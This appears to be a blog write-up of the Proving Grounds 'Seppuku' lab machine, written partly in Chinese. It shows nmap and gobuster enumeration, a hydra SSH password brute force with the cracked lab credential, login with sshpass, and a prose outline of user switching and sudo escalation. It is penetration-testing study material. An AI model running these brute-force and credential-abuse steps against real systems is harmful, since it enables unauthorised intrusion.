OSCP-PG-Seppuku

Mkd1R 2022-5-25 77 5/25

#Enumeration

-nmap

#  nmap -sS -Pn -n -open -T4 -p- 192.168.240.90
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
7080/tcp open  empowerid
7601/tcp open  unknown
8088/tcp open  radan-http

-nmap2

# nmap -p 21,22,80,139,445,7080,7601,8088 -A 192.168.240.90
                                                                                                                                                                             
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
|   256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_  256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp   open  http        nginx 1.14.2
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
| ssl-cert: Subject: commonName=seppuku/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-05-13T06:51:35
|_Not valid after:  2022-08-11T06:51:35
|_ssl-date: TLS randomness does not represent time
|_http-title:  404 Not Found
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_http-server-header: LiteSpeed
7601/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: Seppuku
|_http-server-header: Apache/2.4.38 (Debian)
8088/tcp open  http        LiteSpeed httpd
|_http-title: Seppuku
|_http-server-header: LiteSpeed
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (91%), Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%), Linux 3.10 - 3.12 (90%), Linux 3.4 (90%), Linux 3.5 (90%), Linux 3.7 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m37s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-24T12:36:48
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: seppuku
|   NetBIOS computer name: SEPPUKU\x00
|   Domain name: \x00
|   FQDN: seppuku
|_  System time: 2022-05-24T08:36:49-04:00

#Web enumeration

-Gobuster

# gobuster dir -u http://192.168.240.90:7601/ -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt
===============================================================
/a                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/a/]
/b                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/b/]
/c                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/c/]
/ckeditor             (Status: 301) [Size: 326] [--> http://192.168.240.90:7601/ckeditor/]
/d                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/d/]       
/database             (Status: 301) [Size: 326] [--> http://192.168.240.90:7601/database/]
/e                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/e/]       
/f                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/f/]       
/h                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/h/]       
/index.html           (Status: 200) [Size: 171]                                           
/keys                 (Status: 301) [Size: 322] [--> http://192.168.240.90:7601/keys/]    
/production           (Status: 301) [Size: 328] [--> http://192.168.240.90:7601/production/]
/q                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/q/]         
/r                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/r/]         
/secret               (Status: 301) [Size: 324] [--> http://192.168.240.90:7601/secret/]    
/server-status        (Status: 403) [Size: 281]                                             
/stg                  (Status: 301) [Size: 321] [--> http://192.168.240.90:7601/stg/]       
/t                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/t/]         
/w                    (Status: 301) [Size: 319] [--> http://192.168.240.90:7601/w/] 

-Gobuster2

# gobuster dir -u http://192.168.240.90:8088/ -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt
===============================================================
/blocked              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/blocked/]
/cgi-bin              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/cgi-bin/]
/docs                 (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/docs/]   
/error404.html        (Status: 500) [Size: 1240]                                          
/index.php            (Status: 200) [Size: 163188]                                        
/index.html           (Status: 200) [Size: 171]

-Gobuster3

#gobuster dir -u http://192.168.240.90:8088/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt,json -o gbig2.txt
===============================================================
/cgi-bin              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/cgi-bin/]
/docs                 (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/docs/]   
/index.php            (Status: 200) [Size: 163188]                                        
/index.html           (Status: 200) [Size: 171]                                           
/blocked              (Status: 301) [Size: 1260] [--> http://192.168.240.90:8088/blocked/]
发现一个ssh私钥文件
http://192.168.240.90:7601/keys/
还有一些安全文件,有hostname、passwd.back、password.lst以及shadow.bak

#Exploitation

我使用hostname以及password.lst对主机的ssh服务进行爆破,并且成功了

# hydra -l seppuku -P pass.txt 192.168.240.90 ssh -t 10
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-24 21:00:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 93 login tries (l:1/p:93), ~10 tries per task
[DATA] attacking ssh://192.168.240.90:22/
[STATUS] 72.00 tries/min, 72 tries in 00:01h, 21 to do in 00:01h, 10 active
[22][ssh] host: 192.168.240.90   login: seppuku   password: eeyoree
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-24 21:01:57
这里我获得了一个低权限的shell
# sshpass -p eeyoree ssh seppuku@192.168.240.90           
Linux seppuku 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
seppuku@seppuku:~$ whoami
seppuku
seppuku@seppuku:~$

#Changing user

随后我在当前用户发现了.passwd文件,并且尝试用文件的内容进行用户切换
成功切换为samurai我使用sudo -l查看了当前用户所拥有的权限,但是我没有权限操作tanto目录,所有我们还需切换到tanto用户,因为我们还有一个最初的id_rsa没有使用
很幸运的成功登陆了

tips:
当bash作为 交互式login shell调用,或者使用--login参数作为非交互式shell调用,bash会顺次查找并执行以下脚本:
/etc/profile
~/.bash_profile
~/.bash_login
~/.profile
使用--noprofile选项可以禁止bash调用上面四个启动脚本

#SUID

我们切换到tanto用户之后创建好我们所需要的文件,随后在回退到samurai用户,因为之后samurai用户拥有NOPASSWD执行权限
此时已经获得了最高root权限
- THE END -

Mkd1R

7月02日21:54

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。